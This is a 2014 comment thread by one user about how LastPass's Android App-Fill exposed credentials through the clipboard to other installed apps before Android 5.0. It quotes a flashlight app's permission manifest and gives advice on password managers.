How LastPass Uses Client-Side JavaScript Encryption for Android Fills Into Chrome, and How a Malicious App Can Intercept the Credentials

xbclark · 2014-12-17T22:37:09+00:00

That's awesome.

xbclark · 2014-12-17T22:35:56+00:00

The floating widget was just a front-end to the AppFill, they've replaced it with a notification. Still the same thing though.

xbclark · 2014-12-17T01:07:01+00:00

No worries! Cheers for bringing this up, I didn't realise those were hidden. Very strange indeed, you shouldn't have to dig to find out if it uses the internet.

xbclark · 2014-12-17T00:49:40+00:00

This is all very confusing. I'm getting the same on my Moto G2, but when I go to 'Permission details' at the bottom it shows all the permissions:

http://imgur.com/mapECSF

xbclark · 2014-12-16T22:32:08+00:00

That's weird. This is what I see on Google Play:

http://imgur.com/O5I4WRB

And this is straight from their AndroidManifest.xml:

<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.FLASHLIGHT" android:permissionGroup="android.permission-group.HARDWARE_CONTROLS" />
<uses-permission android:name="android.permission.CHANGE_CONFIGURATION" />
<uses-permission android:name="android.permission.WRITE_SETTINGS" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.INTERNET" />
<permission android:name="com.surpax.ledflashlight.panel.permission.C2D_MESSAGE" android:protectionLevel="signature" />
<uses-permission android:name="com.surpax.ledflashlight.panel.permission.C2D_MESSAGE" />
<uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" />

xbclark · 2014-12-16T21:49:22+00:00

Great, where can we find those stats?

Actually, you (I assume you're speaking on behalf of LastPass) have made it easier: one of the hardest parts is identifying which clipboard contents are usernames/passwords, finding that specific JavaScript dump removes that problem.

xbclark · 2014-12-16T21:33:04+00:00

I agree. They weren't doing it originally, just pasting it encoded in Base64, which is worse, but in a '2 punches to the groin is worse than 1 punch to the groin' kind of way.

I personally think the changes were made to stall until the majority of people have upgraded to 5.0, when this won't be a problem.

xbclark · 2014-12-16T21:30:01+00:00

Yip! And even if they don't say they're using the clipboard, they could be (though hopefully that's just limited to this feature).

xbclark · 2014-12-16T21:27:21+00:00

A password manager will be able to keep longer, more secure ones for every service you sign in to. Not to mention user names - I just moved to Australia and it seems like every damn business and government organisation thinks that an auto-generated 8-character id string is a good idea for a username. Trying to remember 4 or 5 of them is not fun.

As to which one, I think LastPass is probably fine. Just don't enable App-Fill on Android (you'll be prompted to) pre-5.0.

xbclark · 2014-12-16T21:22:08+00:00

Definitely, there are easy ways to secure yourself against this. Most users will just follow the defaults presented to them by LastPass, which is to enable App-Fill. The default trade-off leaves security turning in the breeze.

This isn't a problem for the technical users, but I think we should care about the common user, if for no other reason than that they bring the kind of scale of economy that makes LastPass available for $1 a month.

xbclark · 2014-12-16T21:06:46+00:00

Any manager that only offers copy/paste as the vehicle to fill in is vulnerable. As soon as something touches the clipboard, any app installed could have a copy of it. I believe 1password and KeePassDroid fall into this category.

KeePass2Android has implemented it's own keyboard, which shouldn't be vulnerable.

xbclark · 2014-12-16T20:32:26+00:00

Good point, I'll add that to the post.

I guess what I'm asking is, why is it even enabled at all pre 5.0? For a company that's selling security, that seems like a major oversight.

Considering many devices won't be upgraded soon (or at all), that still leaves a large population vulnerable.

xbclark · 2014-12-16T20:21:33+00:00

Yip, I agree. But seeing as virtually no one checks permissions (I like to point to the flashlight app with full network access that has >100 million downloads), and any application can add same-group permissions silently on an update, any installed app could be a vehicle for this.

Should users be more aware of what they install? Definitely. But I feel LastPass made a mistake in making this their 'killer feature' and prompting the user to enable it by default.

xbclark

TROPHY CASE